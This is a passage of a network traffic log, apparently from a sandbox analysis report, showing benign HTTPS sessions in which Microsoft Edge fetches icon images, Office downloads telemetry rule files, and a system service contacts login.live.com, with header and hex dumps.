                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 2229
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBD59359A9E77B
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: fe635377-201e-0059-1c7c-296d81000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-r197bdfb6b4zd9tpkpdngrtchw00000004t000000000hyap
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC2229INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                76192.168.2.54985313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-16849878b787bfsh7zgp804my400000004eg000000000zmw
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                77192.168.2.54985220.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:32 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.5
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BL2
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 74dc1bab-594e-41ac-a40c-d3df653c0c6c
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF0001DA0A V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                78192.168.2.54985413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-15b8d89586fxdh48qknu9dqk2g00000009f000000000fdsv
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                79192.168.2.54985513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 57989b77-d01e-0049-621c-27e7dc000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-16849878b7828dsgct3vrzta70000000042g000000001m3s
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                80192.168.2.54985613.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC425OUTGET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 1154
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBD5935D5B3965
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 3b7f99e2-a01e-0061-032b-282cd8000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-16849878b78zqkvcwgr6h55x9n00000004y000000000qwq8
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC1154INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                81192.168.2.54985713.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 2cfbf663-801e-0083-68dc-26f0ae000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-17c5cb586f64v7xsc2ahm8gsgw00000000p00000000002r4
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                82192.168.2.54985813.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC431OUTGET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 1468
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBDCB5E23DFC43
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 93030556-001e-000a-513d-29718e000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-r197bdfb6b4bq7nf8dgr5rzeq400000000x0000000006y3a
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
